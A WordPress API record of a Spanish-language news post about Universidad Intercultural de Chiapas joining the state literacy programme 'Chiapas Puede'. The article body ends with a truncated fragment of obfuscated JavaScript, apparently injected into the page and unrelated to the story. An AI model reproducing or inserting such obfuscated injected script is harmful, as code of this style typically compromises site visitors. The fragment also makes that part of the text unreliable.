{"id":19656,"date":"2025-01-09T03:22:02","date_gmt":"2025-01-09T03:22:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19656"},"modified":"2025-01-09T03:22:02","modified_gmt":"2025-01-09T03:22:02","slug":"la-unich-se-suma-al-proyecto-de-alfabetizacion-implementado-por-el-gobierno-de-chiapas-chiapas-puede","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19656","title":{"rendered":"La UNICH se suma al proyecto de alfabetizaci\u00f3n implementado por el Gobierno de Chiapas \u201cChiapas Puede\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-08-at-5.44.34-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-19657\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-08-at-5.44.34-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-08-at-5.44.34-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-08-at-5.44.34-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-08-at-5.44.34-PM.jpeg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<br>8 de enero del 2025. SCLC.- Estudiantes, docentes y trabajadores de la Universidad Intercultural de Chiapas (UNICH) se sumar\u00e1n al proyecto de alfabetizaci\u00f3n anunciado por el Gobernador del Estado de Chiapas, Eduardo Ram\u00edrez Aguilar, el cual se implementa a trav\u00e9s de la Secretar\u00eda de Educaci\u00f3n, como parte del Plan de Atenci\u00f3n Institucional del programa \u201cChiapas Puede\u201d.<\/p>\n\n\n\n<p>Durante una reuni\u00f3n, el Rector de la UNICH, Javier L\u00f3pez S\u00e1nchez, con coordinadores de las Unidades Acad\u00e9micas Multidisciplinarias (UAM\u2019s) de Yajal\u00f3n, Valle del Tulij\u00e1, Oxchuc, Bachaj\u00f3n, Las Margaritas, El Porvenir, as\u00ed como coordinadores de las Licenciaturas en Turismo Alternativo, Desarrollo Sustentable, Lengua y Cultura, M\u00e9dico Cirujano, Comunicaci\u00f3n Intercultural, Derecho Intercultural y Agroecolog\u00eda, coordinadores de diferentes \u00e1reas de esta casa de estudio, y Profesores de Tiempo Completo (PTC), se present\u00f3 el proyecto \u201cUnich alfabetiza\u201d donde se espera una participaci\u00f3n de m\u00e1s de 2,700 alfabetizadores y lograr una poblaci\u00f3n atendida de m\u00e1s de 27 mil personas de diferentes regiones de Chiapas.<\/p>\n\n\n\n<p>El Rector, Dr. Javier L\u00f3pez S\u00e1nchez dijo a los Universitarios &#8220;se ha creado un modelo ecl\u00e9ctico de Alfabetizaci\u00f3n en Chiapas que se llama Mat\u00edas de C\u00f3rdoba, con el Liderazgo del Se\u00f1or Secretario de Educaci\u00f3n, Dr. Roger Mandujano, por lo que invito a todas y todos al Colectivo Humanista Intercultural UNICH Alfabetiza, y por la justicia social humanista que encabeza el Se\u00f1or Gobernador, Dr. Eduardo Ramirez Aguilar&#8221;<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal8 de enero del 2025. SCLC.- Estudiantes, docentes y trabajadores de la Universidad Intercultural de Chiapas (UNICH) se sumar\u00e1n al proyecto de alfabetizaci\u00f3n anunciado por el Gobernador del Estado de Chiapas, Eduardo Ram\u00edrez Aguilar, el cual se implementa a trav\u00e9s de la Secretar\u00eda de Educaci\u00f3n, como parte del Plan de Atenci\u00f3n Institucional del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19657,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19656","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19656"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19656\/revisions"}],"predecessor-version":[{"id":19658,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19656\/revisions\/19658"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19657"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}